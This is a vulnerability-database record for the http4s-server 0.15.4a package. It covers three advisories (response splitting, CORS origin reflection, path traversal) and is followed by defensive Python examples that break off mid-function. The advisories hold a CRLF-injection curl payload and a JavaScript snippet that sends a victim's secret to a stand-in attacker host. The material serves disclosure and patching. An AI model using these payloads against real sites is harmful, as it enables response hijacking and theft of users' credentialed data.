{"url":"http://public2.vulnerablecode.io/api/packages/443800?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.15.4a","type":"maven","namespace":"org.http4s","name":"http4s-server_2.12","version":"0.15.4a","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"0.21.29","latest_non_vulnerable_version":"0.23.4","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42184?format=json","vulnerability_id":"VCID-1p59-n3nc-d7fg","summary":"Response Splitting from unsanitized headers\n### Impact\n\nhttp4s is vulnerable to response-splitting or request-splitting attacks when untrusted user input is used to create any of the following fields:\n\n* Header names (`Header.name`)\n* Header values (`Header.value`)\n* Status reason phrases (`Status.reason`)\n* URI paths (`Uri.Path`)\n* URI authority registered names (`Uri.RegName`) (through 0.21)\n\nThe following backends render invalid carriage return, newline, or null characters in an unsafe fashion:\n\n|                | blaze-server | ember-server | blaze-client | ember-client | jetty-client |\n|:---------------|:-------------|:-------------|:-------------|:-------------|:-------------|\n| header names   | ⚠            | ⚠            | ⚠            | ⚠            | ⚠            |\n| header values  | ⚠            | ⚠            | ⚠            | ⚠            |              |\n| status reasons | ⚠            | ⚠            |              |              |              |\n| URI paths      |              |              | ⚠            | ⚠            |              |\n| URI regnames   |              |              | ⚠ (< 0.22)   | ⚠ (< 0.22)   |              |\n\nFor example, given the following service:\n\n```scala\nimport cats.effect._\nimport org.http4s._\nimport org.http4s.dsl.io._\nimport org.http4s.server.blaze.BlazeServerBuilder\nimport scala.concurrent.ExecutionContext.global\n\nobject ResponseSplit extends IOApp {\n  override def 
run(args: List[String]): IO[ExitCode] =\n    BlazeServerBuilder[IO](global)\n      .bindHttp(8080)\n      .withHttpApp(httpApp)\n      .resource\n      .use(_ => IO.never)\n\n  val httpApp: HttpApp[IO] =\n    HttpApp[IO] { req =>\n      req.params.get(\"author\") match {\n        case Some(author) =>\n          Ok(\"The real content\")\n            .map(_.putHeaders(Header(\"Set-Cookie\", s\"author=${author}\")))\n        case None =>\n          BadRequest(\"No author parameter\")\n      }\n    }\n}\n```\n\nA clean `author` parameter returns a clean response:\n\n```sh\ncurl -i 'http://localhost:8080/?author=Ross'\n```\n\n```http\nHTTP/1.1 200 OK\nContent-Type: text/plain; charset=UTF-8\nSet-Cookie: author=Ross\nDate: Mon, 20 Sep 2021 04:12:10 GMT\nContent-Length: 16\n\nThe real content\n```\n\nA malicious `author` parameter (here a percent-encoded CRLF followed by a forged `Content-Length` header and body) lets anyone who can influence the request hijack the response from our server and return different content:\n\n```sh\ncurl -i 'http://localhost:8080/?author=hax0r%0d%0aContent-Length:+13%0d%0a%0aI+hacked+you'\n```\n\n```http\nHTTP/1.1 200 OK\nContent-Type: text/plain; charset=UTF-8\nSet-Cookie: author=hax0r\nContent-Length: 13\n\nI hacked you\n```\n\n### Patches\n\nVersions 0.21.29, 0.22.5, 0.23.4, and 1.0.0-M27 perform the following:\n\n* If a status reason phrase is invalid, it is dropped. Rendering a reason phrase is optional per spec.\n* If a header name is invalid in a request or response, the header is dropped.  There is no way to generically sanitize a header name without potentially shadowing a correct one.\n* If a header value is invalid in a request or response, it is sanitized by replacing null (`\\u0000`), carriage return (`\\r`), and newline (`\\n`) with space (` `) characters per spec.\n* If a URI path or registered name is invalid in a request line, the client raises an `IllegalArgumentException`.\n* If a URI registered name is invalid in a host header, the client raises an `IllegalArgumentException`. 
\n\n### Workarounds\n\nhttp4s services and client applications should sanitize any user input in the aforementioned fields before returning a request or response to the backend.  The carriage return, newline, and null characters are the most threatening.\n\nNot all backends were affected: jetty-server, tomcat-server, armeria, and netty on the server; async-http-client, okhttp-client, armeria, and netty as clients.\n\n### References\n* https://owasp.org/www-community/attacks/HTTP_Response_Splitting\n* https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [GitHub](http://github.com/http4s/http4s)\n* Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-41084","reference_id":"","reference_type":"","scores":[{"value":"0.00451","scoring_system":"epss","scoring_elements":"0.63985","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-41084"},{"reference_url":"https://github.com/http4s/http4s","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s"},{"reference_url":"https://github.com/http4s/http4s/commit/d02007db1da4f8f3df2dbf11f1db9ac7afc3f9d8","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/commit/d02007db1da4f8f3df2dbf11f1db9ac7afc3f9d8"},{"reference_url":"https://github.com/http4s/http4s/security/advisories/GHSA-5vcm-3xc3-w7x3","reference
_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/security/advisories/GHSA-5vcm-3xc3-w7x3"},{"reference_url":"https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41084","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41084"},{"reference_url":"https://owasp.org/www-community/attacks/HTTP_Response_Splitting","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://owasp.org/www-community/attacks/HTTP_Response_Splitting"},{"reference_url":"https://github.com/advisories/GHSA-5vcm-3xc3-w7x3","reference_id":"GHSA-5vcm-3xc3-w7x3","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-5vcm-3xc3-w7x3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/76257?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.21.29","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.21.29"},{"url":"htt
p://public2.vulnerablecode.io/api/packages/76258?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.22.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.22.5"},{"url":"http://public2.vulnerablecode.io/api/packages/76259?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.23.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.23.4"}],"aliases":["CVE-2021-41084","GHSA-5vcm-3xc3-w7x3"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1p59-n3nc-d7fg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42224?format=json","vulnerability_id":"VCID-8w5c-xgr6-fbh6","summary":"Default CORS config allows any origin with credentials\n### Impact\n\n#### Origin reflection attack\n\nThe default CORS configuration is vulnerable to an origin reflection attack.  Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com:\n\n```scala\nval routes: HttpRoutes[F] = HttpRoutes.of {\n  case req if req.pathInfo === \"/secret\" =>\n    Response(Ok).withEntity(password).pure[F]\n}\nval app = CORS(routes.orNotFound)\n```\n\nThe following request is made to our server:\n\n```http\nGET /secret HTTP/1.1\nHost: vulnerable.example.com\nOrigin: https://adversary.example.org\nCookie: sessionId=...\n```\n\nWhen the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting.  
Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin:\n\n```http\nHTTP/1.1 200 OK\nAccess-Control-Allow-Origin: https://adversary.example.org\nAccess-Control-Allow-Credentials: true\nContent-Type: text/plain\n\np4ssw0rd\n```\n\nA malicious script running on `https://adversary.example.org/` can then make a credentialed request to `https://vulnerable.example.com/secret` with the victim's cookies, read the response, and exfiltrate it:\n\n```javascript\nvar req = new XMLHttpRequest();\nreq.onload = reqListener;\nreq.open('GET', 'https://vulnerable.example.com/secret', true);\nreq.withCredentials = true;\nreq.send();\n\nfunction reqListener() {\n    location = '//bad-people.example.org/log?key=' + encodeURIComponent(this.responseText);\n}\n```\n\n#### Null origin attack\n\nThe middleware is also susceptible to a null origin attack.  A user agent may send `Origin: null` when a request is made from a sandboxed iframe.  The CORS-wrapped http4s app will respond with `Access-Control-Allow-Origin: null`, permitting a similar exfiltration of secrets to the above.\n\n### Patches\n\nThe problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25.  The original `CORS` implementation and `CORSConfig` are deprecated.  In addition to the origin vulnerability, the new signatures also fix the deficiencies of the deprecated implementation listed under Workarounds below.\n\n### Migration\n\nThe `CORS` object exposes a default `CORSPolicy` via `CORS.policy`.  This can be configured with various `with*` methods, like any http4s builder.  
Finally, the `CORSPolicy` may be applied to any `Http`, like any other http4s middleware:\n\n```scala\nval routes: HttpRoutes[F] = ???\nval cors = CORS.policy\n  .withAllowOriginAll\n  .withAllowCredentials(false)\n  .apply(routes)\n```\n\n### Workarounds\n\nIt is possible to be safe in unpatched versions, but note the following defects exist:\n\n* The `anyMethod` flag, enabled by default, accepts methods that cannot be enumerated in the `Access-Control-Allow-Methods` preflight response.\n* Rejected CORS requests receive a `403` response, when the client should be the enforcement point. The server should just omit all CORS response headers.\n* Does not send `Vary: Access-Control-Request-Headers` on preflight requests. This may confuse caches.\n* Does not validate the `Access-Control-Request-Headers` of a preflight request. This validation is not mandated by the Fetch standard, but is typical of most server implementations.\n* Needlessly sends `Vary: Access-Control-Request-Method` on non-preflight requests.  This should be harmless in practice.\n* Needlessly sends `Access-Control-Max-Age` header on non-preflight requests.  This should be harmless in practice.\n* Sends an invalid `Access-Control-Allow-Credentials: false` instead of omitting the header.  
This should be harmless in practice.\n\n#### Explicit origins\n\nIn versions before the patch, set `anyOrigin` to `false`, and then specifically include trusted origins in `allowedOrigins`.\n\n##### 0.21.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORS.DefaultConfig.copy(\n  anyOrigin = false,\n  allowedOrigins = Set(\"http://trusted.example.com\")\n)\nval cors = CORS(routes, config)\n```\n\n##### 0.22.x, 0.23.x, 1.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORSConfig.default\n  .withAnyOrigin(false)\n  .withAllowedOrigins(Set(\"http://trusted.example.com\"))\nval cors = CORS(routes, config)\n```\n\n#### Disable credentials\n\nAlternatively, sharing of responses tainted by credentials can be disabled.  With credentials disallowed, a reflected origin can no longer read a response that required the victim's cookies, so the credentialed exfiltration above fails even though the origin is still reflected.\n\n##### 0.21.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORS.DefaultConfig.copy(allowCredentials = false)\nval cors = CORS(routes, config)\n```\n\n##### 0.22.x, 0.23.x, 1.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORSConfig.default.withAllowedCredentials(false)\nval cors = CORS(routes, config)\n```\n\n### References\n* The [MDN guide to CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS)\n* [PayloadsAllTheThings CORS misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/6cba7ceda93c3f64559c3e73881c21076536e5fb/CORS%20Misconfiguration/README.md)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [GitHub](http://github.com/http4s/http4s)\n* Contact us via the [http4s security 
policy](https://github.com/http4s/http4s/security/policy)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-39185","reference_id":"","reference_type":"","scores":[{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.37842","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-39185"},{"reference_url":"https://github.com/http4s/http4s","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s"},{"reference_url":"https://github.com/http4s/http4s/releases/tag/v0.23.2","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/releases/tag/v0.23.2"},{"reference_url":"https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-39185","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-39185"},{"reference_url":"https://github.com/advisories/GHSA-52cf-226f-rhr6","reference_id":"GHSA-52cf-226f-rhr6","reference_type":"","scores":[],"url":"https://gi
thub.com/advisories/GHSA-52cf-226f-rhr6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/76303?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.21.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p59-n3nc-d7fg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.21.27"},{"url":"http://public2.vulnerablecode.io/api/packages/76305?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.22.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p59-n3nc-d7fg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.22.3"},{"url":"http://public2.vulnerablecode.io/api/packages/76306?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.23.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p59-n3nc-d7fg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.23.2"}],"aliases":["CVE-2021-39185","GHSA-52cf-226f-rhr6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8w5c-xgr6-fbh6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/40995?format=json","vulnerability_id":"VCID-gvst-fbdw-tyhq","summary":"Local file inclusion vulnerability in http4s\n### Impact\n\nThis vulnerability applies to all users of:\n* `org.http4s.server.staticcontent.FileService`\n* `org.http4s.server.staticcontent.ResourceService`\n* `org.http4s.server.staticcontent.WebjarService`\n\n#### Path escaping\n\nURI normalization is applied incorrectly.  Requests whose path info contain `../` or `//` can expose resources outside of the configured location.  
Specifically:\n\n* `FileService` may expose any file on the local file system.\n* `ResourceService` may expose any resource on the class path.\n\n#### Prefix matching\n\nWhen the service is configured with a non-empty `pathPrefix` that doesn't end in a slash, any directory whose name begins with `systemPath` (for `FileService`) or `pathPrefix` (for `ResourceService`) is exposed.  For example, if `pathPrefix` is `/foo` and `systemPath` is `/bar`, a request to `/foobaz/quux.txt` exposes the file `/barbaz/quux.txt`, when only files beneath `/bar` should be available.\n\n#### URI decoding\n\nURI segments are not decoded before resource resolution.  This causes resources with reserved characters in their name to incorrectly return a 404.  It also may incorrectly expose the rare resource whose name is URI encoded.  This applies to `FileService`, `ResourceService`, and `WebjarService`.\n\n### Patches\n\nIn all three services, paths with an empty segment, a `.` segment, or a `..` segment are now rejected with a `400 Bad Request` response.  This fixes exposure outside the configured root.  Many clients already eliminate dot segments according to the rules in [RFC3986, Section 5.2.4](https://tools.ietf.org/html/rfc3986#section-5.2.4).  A middleware that does so at the server level may be considered if there is demand.\n\nIf `pathInfo` is non-empty, and does not begin with `/`, then a 404 response is generated.  This fixes the prefix matching exposure.\n\nAll path segments are URI decoded before being passed to the file system or resource path.  
This allows resolution of resources with reserved characters in the name, and prevents incorrect exposure of resources whose names are themselves URI encoded.\n\n### Workarounds\n\nThe recommended course is to upgrade:\n* v0.18.26, binary compatible with the 0.18.x series\n* v0.20.20, binary compatible with the 0.20.x series\n* v0.21.2, binary compatible with the 0.21.x series\n\nNote that 0.19.0 is a deprecated release and has never been supported.\n\nIf an upgrade is impossible:\n\n* Temporarily copy `FileService.scala`, `ResourceService.scala`, and `WebjarService.scala` from the appropriate release series into your project and recompile with that, changing the package name and reference in your application.\n* Users of a servlet backend can use the servlet container's file serving capabilities.\n\n### Credits\n\nThank you to Thomas Gøytil for the discovery, responsible disclosure, and assistance testing of this vulnerability.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [http4s/http4s](http://github.com/http4s/http4s)\n* Email a maintainer:\n  * [Ross A. 
Baker](mailto:ross@rossabaker.com)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-5280","reference_id":"","reference_type":"","scores":[{"value":"0.00848","scoring_system":"epss","scoring_elements":"0.75158","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-5280"},{"reference_url":"https://github.com/http4s/http4s/commit/250afddbb2e65b70ca9ddaec9d1eb3aaa56de7ec","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/commit/250afddbb2e65b70ca9ddaec9d1eb3aaa56de7ec"},{"reference_url":"https://github.com/http4s/http4s/commit/752b3f63a05a31d2de4f8706877aa08d6b89efca","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/commit/752b3f63a05a31d2de4f8706877aa08d6b89efca"},{"reference_url":"https://github.com/http4s/http4s/commit/b87f31b2292dabe667bec3b04ce66176c8a3e17b","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/commit/b87f31b2292dabe667bec3b04ce66176c8a3e17b"},{"reference_url":"https://github.com/http4s/http4s/security/advisories/GHSA-66q9-f7ff-mmx6","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textu
al","scoring_elements":""}],"url":"https://github.com/http4s/http4s/security/advisories/GHSA-66q9-f7ff-mmx6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-5280","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-5280"},{"reference_url":"https://github.com/advisories/GHSA-66q9-f7ff-mmx6","reference_id":"GHSA-66q9-f7ff-mmx6","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-66q9-f7ff-mmx6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74560?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.18.26","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p59-n3nc-d7fg"},{"vulnerability":"VCID-8w5c-xgr6-fbh6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.18.26"},{"url":"http://public2.vulnerablecode.io/api/packages/74561?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.20.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p59-n3nc-d7fg"},{"vulnerability":"VCID-8w5c-xgr6-fbh6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.20.20"},{"url":"http://public2.vulnerablecode.io/api/packages/74562?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.21.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p59-n3nc-d7fg"},{"vulnerability":"VCID-8w5c-xgr6-fbh6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.21.2"}],"aliases":["CVE-2020-5280","GHSA-66q9-f7ff-mmx6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":
"http://public2.vulnerablecode.io/vulnerabilities/VCID-gvst-fbdw-tyhq"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.15.4a"}
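The response-splitting advisory above (VCID-1p59-n3nc-d7fg, CVE-2021-41084) describes both the failure (a CRLF in a header value ends the header block early and hands the rest of the message to the attacker) and the fix the patched releases apply (drop invalid header names and reason phrases, replace CR, LF and NUL in header values with spaces). The Python below is an added example written for this page, not http4s code: it models a response renderer in plain strings, puts a naive renderer beside one that applies the advisory's three rules, and feeds both the decoded `author` value from the advisory's curl command. The header list, the body text and the `split_message`/`demo` helpers are constructed for the example.

```python
import re

# RFC 7230 "token": a header name must be one or more of these characters.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
# CR, LF and NUL inside a field value are replaced by SP, as the advisory's patch describes.
_VALUE_FIX = str.maketrans({"\r": " ", "\n": " ", "\x00": " "})
_BAD_REASON = re.compile(r"[\r\n\x00]")

# Constructed input: the decoded `author` value from the advisory's curl command.
MALICIOUS_AUTHOR = "hax0r\r\nContent-Length: 13\r\n\r\nI hacked you"
BODY = "The real content"


def render_naive(status, reason, headers, body):
    """Vulnerable renderer: every field is interpolated verbatim, so a CRLF in a
    value terminates that header and lets the attacker write the rest of the message."""
    lines = [f"HTTP/1.1 {status} {reason}"]
    lines += [f"{name}: {value}" for name, value in headers]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def render_sanitized(status, reason, headers, body):
    """Hardened renderer applying the three rules from the advisory's Patches section."""
    status_line = f"HTTP/1.1 {status}"
    if reason and not _BAD_REASON.search(reason):
        status_line += f" {reason}"  # reason phrase is optional: drop it when invalid
    lines = [status_line]
    for name, value in headers:
        if not _TOKEN.match(name):
            continue  # invalid name: drop the header; rewriting it could shadow a real one
        lines.append(f"{name}: {value.translate(_VALUE_FIX)}")
    return "\r\n".join(lines) + "\r\n\r\n" + body


def split_message(raw):
    """Return (list of header names, body) as a downstream HTTP parser would see them."""
    head, body = raw.split("\r\n\r\n", 1)
    names = [line.split(":", 1)[0] for line in head.split("\r\n")[1:]]
    return names, body


def demo(author=MALICIOUS_AUTHOR):
    """Render the advisory's Set-Cookie response both ways for the given author value."""
    headers = [
        ("Content-Type", "text/plain; charset=UTF-8"),
        ("Set-Cookie", f"author={author}"),
        ("Content-Length", str(len(BODY))),
    ]
    return render_naive(200, "OK", headers, BODY), render_sanitized(200, "OK", headers, BODY)


if __name__ == "__main__":
    naive, safe = demo()
    print(naive)
    print("----")
    print(safe)
```

With the naive renderer the attacker's `Content-Length: 13` becomes a real header and `I hacked you` becomes the body; the sanitized renderer keeps the injected text inside the single `Set-Cookie` value, where a parser treats it as cookie data, and the real body is delivered intact.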
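The CORS advisory above (VCID-8w5c-xgr6-fbh6, CVE-2021-39185) turns on one decision: which `Origin` values the server echoes back in `Access-Control-Allow-Origin`, and whether it pairs that with `Access-Control-Allow-Credentials: true`. The Python below is an added example for this page, not the http4s middleware. `cors_headers_vulnerable` reflects any origin, including `null`, the way the advisory describes the deprecated default config; `cors_headers_hardened` applies an explicit allowlist, refuses `null`, omits all CORS headers on rejection instead of answering 403, and never pairs `*` with credentials; `browser_can_read` approximates the check a browser makes before exposing a cross-origin response to script. The origin strings are the advisory's example hosts; `allowed_origins`, the `Vary: Origin` header and the function names are this example's own choices.

```python
# Constructed origins: the hosts used in the advisory's example exchange.
VICTIM = "https://vulnerable.example.com"
ATTACKER = "https://adversary.example.org"
TRUSTED = "https://trusted.example.com"


def cors_headers_vulnerable(origin, allow_credentials=True):
    """CORS headers as the advisory describes the deprecated default config
    (anyOrigin = true, allowCredentials = true): whatever Origin arrived is
    echoed back, including the literal string 'null' from a sandboxed iframe."""
    if origin is None:
        return {}
    headers = {"Access-Control-Allow-Origin": origin}
    # The deprecated code also emitted the invalid value "false" instead of omitting the header.
    headers["Access-Control-Allow-Credentials"] = "true" if allow_credentials else "false"
    return headers


def cors_headers_hardened(origin, allowed_origins, allow_credentials=False):
    """Echo only an allowlisted, non-null origin; send Allow-Credentials only with
    such an explicit origin; on rejection emit no CORS headers at all (the browser
    is the enforcement point, so a 403 is neither needed nor helpful)."""
    if origin is None or origin == "null":
        return {}
    if "*" in allowed_origins:
        # A wildcard cannot be combined with credentials: browsers reject that pairing.
        return {} if allow_credentials else {"Access-Control-Allow-Origin": "*"}
    if origin not in allowed_origins:
        return {}
    headers = {"Access-Control-Allow-Origin": origin, "Vary": "Origin"}
    if allow_credentials:
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers


def browser_can_read(response_headers, request_origin, with_credentials):
    """Approximation of the Fetch CORS check a browser applies before exposing a
    cross-origin response body to script."""
    acao = response_headers.get("Access-Control-Allow-Origin")
    if acao is None:
        return False
    if with_credentials:
        return acao == request_origin and \
            response_headers.get("Access-Control-Allow-Credentials") == "true"
    return acao == "*" or acao == request_origin


def exfiltration_possible(policy_headers, origin):
    """Can a script at `origin` read a cookie-gated response from the victim under
    the given CORS response headers? Models the advisory's XMLHttpRequest with
    withCredentials = true."""
    return browser_can_read(policy_headers, origin, with_credentials=True)


if __name__ == "__main__":
    for name, headers in (
        ("default (vulnerable)", cors_headers_vulnerable(ATTACKER)),
        ("default, null origin", cors_headers_vulnerable("null")),
        ("allowlist, attacker", cors_headers_hardened(ATTACKER, {TRUSTED}, allow_credentials=True)),
        ("allowlist, trusted", cors_headers_hardened(TRUSTED, {TRUSTED}, allow_credentials=True)),
    ):
        print(f"{name:>22}: {headers}")
```

The two workarounds in the advisory map onto the hardened function's parameters: "explicit origins" is a non-wildcard `allowed_origins`, and "disable credentials" is `allow_credentials=False`, which on its own already makes `exfiltration_possible` return false for a reflected origin.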
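The local-file-inclusion advisory above (VCID-gvst-fbdw-tyhq, CVE-2020-5280) lists three independent fixes: reject paths with an empty, `.` or `..` segment with 400; answer 404 when `pathInfo` is non-empty but does not start with `/` (the `/foobaz` against `/foo` prefix case); and percent-decode each segment before resolving it. The Python below is an added example for this page, not http4s's `FileService`. It performs the same three checks on a request path as pure string logic (nothing is read from disk) and adds one precaution the advisory does not describe: segments are re-checked after decoding so `%2E%2E` cannot reach the file system as `..`. `path_prefix` and `system_path` default to the advisory's `/foo` and `/bar`; `HttpError`, `strip_prefix` and `status_of` are constructed for the example.

```python
from urllib.parse import unquote


class HttpError(Exception):
    """Raised with the HTTP status the static-content service should answer."""

    def __init__(self, status):
        super().__init__(status)
        self.status = status


def strip_prefix(request_path, path_prefix):
    """pathInfo as a mount prefix leaves it: the request path minus path_prefix.
    If the prefix matched only part of a segment ('/foobaz' against '/foo') the
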